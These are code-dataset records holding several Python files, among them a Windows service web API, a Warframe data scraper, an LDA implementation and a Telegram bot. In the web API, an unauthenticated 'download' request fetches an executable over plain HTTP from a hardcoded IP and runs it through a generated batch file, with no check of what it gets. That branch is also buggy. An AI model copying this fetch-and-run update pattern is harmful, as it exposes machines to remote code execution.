{"api_name": "spaceking.net", "line_number": 171, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "spaceking.log.debug", "line_number": 177, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 177, "usage_type": "name"}, {"api_name": "atexit.register", "line_number": 179, "usage_type": "call"}, {"api_name": "asyncio.start_unix_server", "line_number": 180, "usage_type": "call"}, {"api_name": "spaceking.log.info", "line_number": 187, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 187, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 188, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 188, "usage_type": "name"}, {"api_name": "spaceking.log.debug", "line_number": 191, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 191, "usage_type": "name"}, {"api_name": "spaceking.net.NetEvent", "line_number": 195, "usage_type": "call"}, {"api_name": "spaceking.net", "line_number": 195, "usage_type": "name"}, {"api_name": "spaceking.log.debug", "line_number": 197, "usage_type": "call"}, {"api_name": "spaceking.log", "line_number": 197, "usage_type": "name"}]}
+{"seq_id": "194247979", "text": "# coding:utf-8\n\nimport logging\nimport psutil \nimport time\nimport json\nimport winreg\nimport requests\nimport os\nimport subprocess\nimport globalvar as gl\nfrom urllib.parse import parse_qs\n\n\nlogging.basicConfig(level=logging.DEBUG,format=' %(asctime)s - %(levelname)s - %(message)s')\n#logging.disable(logging.CRITICAL) # 加这句话,就是log全部禁止,不加,就可以log打印了\n\n\n\n# 定义函数,两个参数,都是python本身定义的,默认就行了。\ndef application(environ, start_response):\n \n recordLog('start in webapi')\n # 定义文件请求的类型和当前请求成功的code\n try:\n start_response('200 OK', [('Content-Type', 'application/json;charset=utf-8')])\n d = parse_qs(environ['QUERY_STRING'])\n recordLog(environ['QUERY_STRING'])\n key = d.get('key', [''])[0] # 返回第一个age值.\n recordLog(key)\n except Exception as err:\n recordLog('web err!')\n recordLog(str(err))\n \n \n\n # 获取服务器的硬件运行信息\n if key=='getinfo':\n info=sysInfo()\n json_str = json.dumps(info,ensure_ascii=False,indent=4)\n recordLog('record getinfo')\n recordLog(json.dumps(json_str))\n return [json_str.encode('utf-8')]\n \n # 主动触发服务器下载最新版的热更新\n elif key=='download':\n info = {\"status\": \"download\"}\n try:\n res =requests.get(r'http://47.75.120.191:83/PCInfoService.exe',timeout=30)\n except Exception as err:\n info = {\"status\":str(err)}\n recordLog(str(err))\n\n down=os.path.join(getPath(),'PCInfoService.exe')\n\n try:\n downloadFile = open(down,'wb')\n for chunk in res.iter_content(100000):\n downloadFile.write(chunk)\n #recordLog(os.path.getsize(downloadFile))\n downloadFile.close()\n info = {\"status\":\"download finish\"}\n\n recordLog(\"download finish\")\n \n WriteRestartCmd()\n recordLog(\"update Start\")\n recordLog(\"shutdown\")\n \n except Exception as err:\n recordLog(str(err))\n info = {\"status\":str(err)}\n \n finally:\n return [json_str.encode('utf-8')]\n \n else:\n logging.debug('Noget')\n info = {\"status\": \"none\"}\n json_str = json.dumps(info,ensure_ascii=False,indent=4)\n return [json_str.encode('utf-8')]\n \n#编写bat脚本,删除旧程序,运行新程序\ndef WriteRestartCmd():\n os.chdir(getPath())\n b = open(\"upgrade.bat\",'w')\n TempList = \"@echo off\\n\"; #关闭bat脚本的输出\n TempList += \"if not exist pcinfoservice.exe exit \\n\"; #新文件不存在,退出脚本执行\n TempList += \"sc stop pcinfo \\n\" \n TempList += \"ping /n 5 127.1>nul \\n\" #5秒后删除旧程序(3秒后程序已运行结束,不延时的话,会提示被占用,无法删除)\n TempList += \"del PCInfo.exe /q \\n\"\n TempList += \"ren PCInfoService.exe PCInfo.exe \\n\"\n TempList += \"pcinfo.exe install \\n\"\n TempList += \"sc start pcinfo \\n\"\n TempList += \"sc config pcinfo start= auto\" \n b.write(TempList)\n b.close()\n subprocess.Popen(\"upgrade.bat\")\n\n\ndef recordLog(strmsg): #把strmsg写入日志\n \n os.chdir(getPath())\n try:\n logFile = open(r'web.log','a')\n logFile.write(get_time_stamp()+' ') #写入日志\n logFile.write(strmsg+'\\n')\n except Exception as err:\n logFile.write(get_time_stamp()+' ') #写入日志\n logFile.write('write web.log err!\\n')\n pass\n finally:\n logFile.close()\n return\n\ndef sysInfo():\n info={}\n \n line={}\n try:\n line.setdefault('CPU核心',str(psutil.cpu_count()))\n line.setdefault('CPU利用率',str(int(psutil.cpu_percent())) + '%')\n info['CPU']=line\n\n line={}\n line.setdefault('空闲内存G',str(round(psutil.virtual_memory().free/(1024.0*1024.0*1024.0), 2)))\n line.setdefault('总内存G',str(int(round(psutil.virtual_memory().total/(1024.0*1024.0*1024.0)))))\n line.setdefault('内存利用率',str(int((psutil.virtual_memory().total-psutil.virtual_memory().free)/float(psutil.virtual_memory().total)*100))+ '%')\n info['Memory'] =line\n \n line={}\n \n io = psutil.disk_partitions()\n 
j=0\n except Exception as err:\n recordLog(str(err))\n\t\n for i in io:\n diskstr=[]\n try:\n o = psutil.disk_usage(i.device)\n except Exception as err:\n recordLog(str(err))\n j=j+1\n continue\n \n disk=io[j][0].strip(r':\\\\')\n diskstr.append(str(int(o.free/(1024.0*1024.0*1024.0)))+\"G\")\n diskstr.append(str(int(o.total/(1024.0*1024.0*1024.0)))+\"G\") \n line.setdefault(disk,diskstr)\n del(diskstr)\n j=j+1\n\n info['Disk']=line\n try:\n info.setdefault('version',gl.getvalue('version'))\n except Exception as err:\n recordLog(\"version write err\")\n \n return info\n\ndef getPath():\n #获取服务执行程序的路径\n try:\n key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,r\"SYSTEM\\CurrentControlSet\\Services\\PCInfo\")\n downloadPath =winreg.QueryValueEx(key,\"ImagePath\")\n path=os.path.dirname(downloadPath[0][1:])\n except Exception as err:\n path=r'c:\\windows\\system32'\n recordLog('Path change err: '+ str(err))\n return path\n\n\ndef get_time_stamp():\n ct = time.time()\n local_time = time.localtime(ct)\n data_head = time.strftime(\"%Y-%m-%d %H:%M:%S\", local_time)\n data_secs = (ct - int(ct)) * 1000\n time_stamp = \"%s.%03d\" % (data_head, data_secs)\n return time_stamp\n", "sub_path": "python-book01/2018/2018-07/PChealth/pc_info_windowsService/WebAPI.py", "file_name": "WebAPI.py", "file_ext": "py", "file_size_in_byte": 5748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "urllib.parse.parse_qs", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 80, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 85, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 98, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 103, "usage_type": "call"}, {"api_name": "psutil.cpu_count", "line_number": 121, "usage_type": "call"}, {"api_name": "psutil.cpu_percent", "line_number": 122, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 126, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 127, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 128, "usage_type": "call"}, {"api_name": "psutil.disk_partitions", "line_number": 133, "usage_type": "call"}, {"api_name": "psutil.disk_usage", "line_number": 141, "usage_type": "call"}, {"api_name": "globalvar.getvalue", "line_number": 156, "usage_type": "call"}, {"api_name": "winreg.OpenKey", "line_number": 165, "usage_type": "call"}, {"api_name": "winreg.HKEY_LOCAL_MACHINE", "line_number": 165, "usage_type": "attribute"}, {"api_name": "winreg.QueryValueEx", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 175, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 176, "usage_type": "call"}, 
{"api_name": "time.strftime", "line_number": 177, "usage_type": "call"}]}
+{"seq_id": "570612328", "text": "# Install python 3, duh!\n# Run the command below in a cmd window to install the needed packages, without the #, duh!\n# pip install bs4 requests pandas openpyxl lxml html5lib\n# Run the python file with the included batch file, DUH!\n\ntry:\n # Error handling if something happens during script initialisation\n from csv import QUOTE_ALL # Needed to export data to CSV\n from bs4 import BeautifulSoup # Needed to parse the dynamic webpage of the Ducanator\n from requests import get # Needed to get the webpage of the Ducanator\n from re import search # Needed to find the json string to import into pandas\n from pandas import read_csv, set_option, concat, DataFrame, read_json, read_html, ExcelWriter # Needed to convert the json string into a usable dataframe object for manipulation\n from traceback import format_exc # Needed for more friendly error messages.\n from openpyxl import load_workbook\n from numpy import arange\n from os import path\nexcept ModuleNotFoundError:\n print('OOPSIE WOOPSIE!! Uwu We made a fucky wucky!! A wittle fucko boingo! The code monkeys at our headquarters are working VEWY HAWD to fix this!')\n print('You didn\\'t install the packages like I told you to. Please run \\\"pip install bs4 requests pandas\\\" in a cmd window to install the required packages!')\n print('\\033[1;31m' + format_exc())\n exit(1)\n\ntry:\n #User Variables\n workbook_name = 'Prime_Relic_Data.xlsx'\n csv_name = 'Prime-Relic Data.csv'\n sheet_name_day = 'Day'\n sheet_name_hour = 'Hour'\n sheet_name_relic = 'Relic_Data'\n retry_attempts = 10\n # Sets the URL to scrape, because hard-coding is bad\n print('Downloading Ducat Data')\n url_ducats = \"https://warframe.market/tools/ducats\"\n # Scrapes the given URL\n soup = str(BeautifulSoup(get(url_ducats).content, \"html.parser\")).replace('\\n', '')\n print('Ducat Data Downloaded')\n print('Processing Ducat Data')\n # Finds the needed json string for item data, previous hour data, and previous day data.\n # Slices off the first bit to make a valid json string for pandas later\n items = search('\"items\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[9:]\n previous_hour = search('\"previous_hour\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[17:]\n previous_day = search('\"previous_day\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[16:]\n\n # Reads and sanitises the item data into a pandas dataframe\n df_items = read_json(items)\n df_items = df_items.drop(columns=['url_name', 'thumb'])\n df_items = df_items.reindex(columns=['id', 'item_name'])\n\n # Reads and sanitises the previous day data into a pandas dataframe\n df_previous_day = read_json(previous_day)\n df_previous_day = df_previous_day.drop(columns=['id', 'plat_worth', 'median'])\n df_previous_day = df_previous_day.rename(columns={'item': 'id'})\n # Merges the item data and previous day data on the id column, drops the redundant id column, then renames the column names for export\n df_previous_day_merged = df_items.merge(df_previous_day, how='inner', on='id')\n df_previous_day_merged = df_previous_day_merged.drop(columns=['id'])\n df_previous_day_merged = df_previous_day_merged.reindex(columns=['item_name', 'datetime', 'ducats_per_platinum', 'ducats', 'wa_price','ducats_per_platinum_wa', 'position_change_month', 'position_change_week', 'position_change_day', 'volume'])\n df_previous_day_merged = df_previous_day_merged.sort_values(by='item_name')\n df_previous_day_merged['datetime'] = df_previous_day_merged['datetime'].astype(str).str[:-6]\n\n # Reads and sanitises the 
previous hour data into a pandas dataframe\n df_previous_hour = read_json(previous_hour)\n df_previous_hour = df_previous_hour.drop(columns=['id', 'plat_worth', 'median'])\n df_previous_hour = df_previous_hour.rename(columns={'item': 'id'})\n # Merges the item data and previous hour data on the id column, drops the redundant id column, then renames the column names for export\n df_previous_hour_merged = df_items.merge(df_previous_hour, how='inner', on='id')\n df_previous_hour_merged = df_previous_hour_merged.drop(columns=['id'])\n df_previous_hour_merged = df_previous_hour_merged.reindex(columns=['item_name', 'datetime', 'ducats_per_platinum', 'ducats', 'wa_price','ducats_per_platinum_wa', 'position_change_month', 'position_change_week', 'position_change_day', 'volume'])\n df_previous_hour_merged = df_previous_hour_merged.sort_values(by='item_name')\n df_previous_hour_merged['datetime'] = df_previous_hour_merged['datetime'].astype(str).str[:-6]\n df_previous_hour_merged = df_previous_hour_merged.reset_index(drop=True)\n\n print('Ducat Data Processed')\n # Fuck Comments\n print('Downloading Relic Data')\n url_relics = \"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\"\n relic_data_txt_name = 'RelicData.txt'\n\n if path.isfile(relic_data_txt_name):\n with open(relic_data_txt_name) as f:\n soup = str(f.readlines())\n print(\"Loaded Local Relic Data\")\n else:\n print(\"Loading Remote Item Data\")\n\n for x in range(0, retry_attempts):\n try:\n soup = str(BeautifulSoup(get(url_relics).content, \"html.parser\")).replace('\\n', '')\n print('Saving Local Data')\n with open(relic_data_txt_name, 'w') as f:\n f.write(soup)\n break\n except Exception:\n print('Relic data download failed, retrying... ' + str(retry_attempts - x - 1) + ' attempts left...', end='\\r')\n\n\n print('Relic Data Downloaded')\n print('Processing Relic Data')\n parsed_relics = search('Relics:
', soup).group(0)[34:].replace('th>', 'td>').replace(r'', r' | ').replace('X Kuva', 'x Kuva')\n df_parsed_relics = read_html(parsed_relics, header=None)\n df_parsed_relics = df_parsed_relics[0].replace(to_replace=r'.+\\((.+)\\%\\)', value=r'\\1', regex=True)\n df_parsed_relics[1] = df_parsed_relics[1].astype(float)\n df_parsed_relics = df_parsed_relics.dropna(how='all').fillna(999)\n groups = df_parsed_relics.groupby(arange(len(df_parsed_relics.index)) // 7, sort=False).apply(lambda x: x.sort_values(by=1, ascending=False))\n groups[1] = ' (' + groups[1].astype(str) + '%)'\n groups = groups[0] + groups[1]\n groups = groups.replace(to_replace=r'\\(999.0\\%\\)', value=r'', regex=True)\n templist = []\n templist2 = []\n for count, value in enumerate(groups):\n if count % 7 == 0 and count != 0:\n templist2.append(templist)\n templist = []\n templist.append(value)\n df_even_more_parsed_relics = DataFrame(templist2, columns=['Relic_Name', 'C1', 'C2', 'C3', 'U1', 'U2', 'Rare'])\n df_relic_class = df_even_more_parsed_relics['Relic_Name'].str.split().str[0]\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Class', df_relic_class, allow_duplicates=True)\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Type', df_even_more_parsed_relics['Relic_Name'].str.upper().str.split().str[1], allow_duplicates=True)\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Refinement', df_even_more_parsed_relics['Relic_Name'].str.split().str[3].replace(to_replace=r'[\\(\\)]', value=r'', regex=True), allow_duplicates=True)\n dict = {'Exceptional':'','Flawless':'','Radiant':''}\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C1_Raw', df_even_more_parsed_relics['C1'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C2_Raw', df_even_more_parsed_relics['C2'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C3_Raw', df_even_more_parsed_relics['C3'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U1_Raw', df_even_more_parsed_relics['U1'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U2_Raw', df_even_more_parsed_relics['U2'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Rare_Raw', df_even_more_parsed_relics['Rare'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C1_Odds', df_even_more_parsed_relics['C1'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C2_Odds', df_even_more_parsed_relics['C2'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C3_Odds', df_even_more_parsed_relics['C3'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U1_Odds', df_even_more_parsed_relics['U1'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n 
df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U2_Odds', df_even_more_parsed_relics['U2'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Rare_Odds', df_even_more_parsed_relics['Rare'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Systems Blueprint',value=r'Systems', regex=True)\n df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Neuroptics Blueprint',value=r'Neuroptics', regex=True)\n df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Chassis Blueprint',value=r'Chassis', regex=True)\n #print(df_even_more_parsed_relics.head(5))\n #df_even_more_parsed_relics['Relic_Name'] = df_even_more_parsed_relics['Relic_Name'].str.split(n=1).str[1]\n #df_axi = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Axi'].reset_index(drop=True)\n #df_lith = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Lith'].reset_index(drop=True)\n #df_meso = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Meso'].reset_index(drop=True)\n #df_neo = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Neo'].reset_index(drop=True)\n #df_requiem = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Requiem'].reset_index(drop=True)\n #df_final_export_relic = concat([df_axi,df_lith,df_meso,df_neo,df_requiem], axis=1, ignore_index=True)\n #print(df_even_more_parsed_relics)\n print('Relic Data Processed')\n\n # Export data\n print('Exporting Worksheet')\n df_even_more_parsed_relics.to_csv(csv_name, index=None, quoting=QUOTE_ALL)\n df_previous_day_merged.to_csv('DayPrices.csv', index=None, quoting=QUOTE_ALL)\n with ExcelWriter(workbook_name, mode='a', engine='openpyxl', if_sheet_exists='replace') as writer:\n df_previous_day_merged.to_excel(writer, sheet_name=sheet_name_day)\n df_previous_hour_merged.to_excel(writer, sheet_name=sheet_name_hour)\n df_even_more_parsed_relics.to_excel(writer, sheet_name=sheet_name_relic)\n #df_final_export_relic.to_excel(writer, sheet_name=sheet_name_relic)\n book = load_workbook(workbook_name)\n sheet = book[sheet_name_day]\n sheet.delete_cols(1,1)\n sheet = book[sheet_name_hour]\n sheet.delete_cols(1,1)\n sheet = book[sheet_name_relic]\n sheet.delete_cols(1,1)\n book.save(workbook_name)\n print('If you see this message, things should have worked correctly. Remove the \\\"pause\\\" from the batch script to automatically close this window after use.')\n\nexcept Exception:\n # Error handling if something happens during the main script\n print('OOPSIE WOOPSIE!! Uwu We made a fucky wucky!! A wittle fucko boingo! 
The code monkeys at our headquarters are working VEWY HAWD to fix this!')\n print('\\033[1;31m' + format_exc())\n exit(1)\n", "sub_path": "Scrape the Ducanator.py", "file_name": "Scrape the Ducanator.py", "file_ext": "py", "file_size_in_byte": 12314, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "traceback.format_exc", "line_number": 20, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 35, "usage_type": "call"}, {"api_name": "re.search", "line_number": 40, "usage_type": "call"}, {"api_name": "re.search", "line_number": 41, "usage_type": "call"}, {"api_name": "re.search", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 87, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 87, "usage_type": "call"}, {"api_name": "re.search", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 114, "usage_type": "call"}, {"api_name": "csv.QUOTE_ALL", "line_number": 148, "usage_type": "name"}, {"api_name": "csv.QUOTE_ALL", "line_number": 149, "usage_type": "name"}, {"api_name": "pandas.ExcelWriter", "line_number": 150, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 155, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 168, "usage_type": "call"}]}
+{"seq_id": "413518482", "text": "from .models import User\nfrom django import forms\n\nclass UserForm(forms.ModelForm):\n class Meta:\n # specify model to be used\n model = User\n\n # specify fields to be used\n fields = [\n \"first_name\",\n \"second_name\",\n ]", "sub_path": "students/y2333/practical_works/Gordienko_Maxim/Practice 2/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.forms.ModelForm", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 4, "usage_type": "name"}, {"api_name": "models.User", "line_number": 7, "usage_type": "name"}]}
+{"seq_id": "167001807", "text": "\"\"\"\nSimple implementation of (Fisher's) Linear Discriminant Analysis.\nThanks to: https://www.python-course.eu/linear_discriminant_analysis.php\n\nThe L. D. Matrix is a transformation matrix which best separates\nthe instances of different classes in data projection.\n\"\"\"\nimport numpy as np\n\n\nclass LDA:\n def fit(self, X, y):\n \"\"\"Fit dataset into LDA model.\"\"\"\n self.X = np.array(X)\n self.y = np.array(y)\n\n self.classes, self.cls_freqs = np.unique(y, return_counts=True)\n\n def _scatter_within(self):\n \"\"\"This measure describes how scattered are each class.\"\"\"\n scatter_within = np.array([\n (cls_freq - 1) * np.cov(self.X[self.y == cls, :], rowvar=False)\n for cls, cls_freq in zip(self.classes, self.cls_freqs)\n ]).sum(axis=0)\n\n return scatter_within\n\n def _scatter_between(self):\n \"\"\"This measure describes the separation between different classes.\"\"\"\n class_means = np.array(\n [self.X[self.y == cls, :].mean(axis=0) for cls in self.classes])\n\n total_mean = self.X.mean(axis=0)\n\n scatter_factor = class_means - total_mean\n\n scatter_between = np.array([\n freq * np.outer(sf, sf)\n for freq, sf in zip(self.cls_freqs, scatter_factor)\n ]).sum(axis=0)\n\n return scatter_between\n\n def _get_eig(self, sw, sb):\n \"\"\"Get eigenval/vec from (ScatterWithin)^(-1)*(ScatterBetween) mat.\"\"\"\n sw_inv = np.linalg.inv(sw)\n\n return np.linalg.eig(np.matmul(sw_inv, sb))\n\n def _project(self, eig, num_dim):\n \"\"\"Get the K (``num_dim``) most expressive eigenvalues/vectors.\"\"\"\n eig_vals, eig_vecs = eig\n\n eig_vals, eig_vecs = zip(\n *sorted(\n zip(eig_vals, eig_vecs),\n key=lambda item: item[0],\n reverse=True)[:num_dim])\n\n return eig_vals, eig_vecs\n\n def predict(self, max_dim=2):\n \"\"\"Create transf. matrix which best separates the fitted data proj.\"\"\"\n sw = self._scatter_within()\n sb = self._scatter_between()\n\n max_dim = min(max_dim, self.classes.size-1)\n\n eig = self._get_eig(sw, sb)\n\n eig_vals, eig_vecs = self._project(eig, num_dim=max_dim)\n\n _, num_col = self.X.shape\n\n self.eig_vals = np.array(eig_vals)\n self.transf_mat = np.concatenate(eig_vecs).reshape(num_col, max_dim)\n\n self.transf_mat = self.transf_mat.real\n\n return self.transf_mat\n\n def wilks_lambda(self):\n \"\"\"Compute Wilks' Lambda measure using eigenvalues of L. D. matrix.\"\"\"\n return np.prod(1.0 / (1.0 + self.eig_vals))\n\n def canonical_corr(self):\n \"\"\"Calculate canonical correlation values from L. D. matrix.\"\"\"\n return (self.eig_vals / (1.0 + self.eig_vals))**0.5\n\n\nif __name__ == \"__main__\":\n from sklearn import datasets\n iris = datasets.load_iris()\n\n model = LDA()\n model.fit(iris.data, iris.target)\n ans = model.predict(max_dim=2)\n\n print(\"Transformation Matrix:\", ans, sep=\"\\n\", end=\"\\n\\n\")\n print(\"Eigenvalues of L. D. 
matrix:\", model.eig_vals, end=\"\\n\\n\")\n print(\"Canonical Correlation:\", model.canonical_corr(), end=\"\\n\\n\")\n print(\"Wilks' Lambda:\", model.wilks_lambda())\n", "sub_path": "model-implementation/py-linear-disc-analysis/lda.py", "file_name": "lda.py", "file_ext": "py", "file_size_in_byte": 3243, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.linalg.eig", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 93, "usage_type": "name"}]}
+{"seq_id": "291454234", "text": "import os\nimport time\n\nfrom telegram import Update\nfrom telegram.ext import Updater, CommandHandler\n\nfrom data.copart import Copart\nfrom data.utils import EditThread\n\n\ndef search(update: Update, context):\n default_args = [*([0, float('inf')] * 2)]\n names = ['year_from', 'year_to', 'price_from', 'price_to']\n try:\n filters = {names[i]: int(context.args[i]) if i < len(context.args) and context.args[i] != '-1'\n else default_args[i] for i in range(len(default_args))}\n except ValueError:\n return update.message.reply_text('Все аргументы должны быть целочисленными!')\n message = update.message.reply_text('Начинаем поиск...')\n edit_thread = EditThread(message)\n edit_thread.start()\n start_time = time.time()\n copart = Copart()\n output = copart.get_data(filters)\n edit_thread.stop()\n update.message.reply_text(f'Найдено {len(output)} автомобилей.\\n'\n f'Время поиска: {time.time() - start_time:.2f} секунд')\n for car in output:\n update.message.reply_text(car['ld'])\n\n\ndef start(update, _):\n update.message.reply_text('Привет! Это бот-парсер американских автобирж. '\n 'Введите /search {year_from} {year_to} {price_from} {price_to} '\n 'для поиска авто')\n\n\ndef main():\n updater = Updater(os.getenv('tg_token'))\n updater.dispatcher.add_handler(CommandHandler('start', start))\n updater.dispatcher.add_handler(CommandHandler('search', search, pass_args=True))\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "parsing/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1756, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "telegram.Update", "line_number": 11, "usage_type": "name"}, {"api_name": "data.utils.EditThread", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 22, "usage_type": "call"}, {"api_name": "data.copart.Copart", "line_number": 23, "usage_type": "call"}, {"api_name": "time.time", "line_number": 27, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 39, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 39, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 40, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 41, "usage_type": "call"}]}
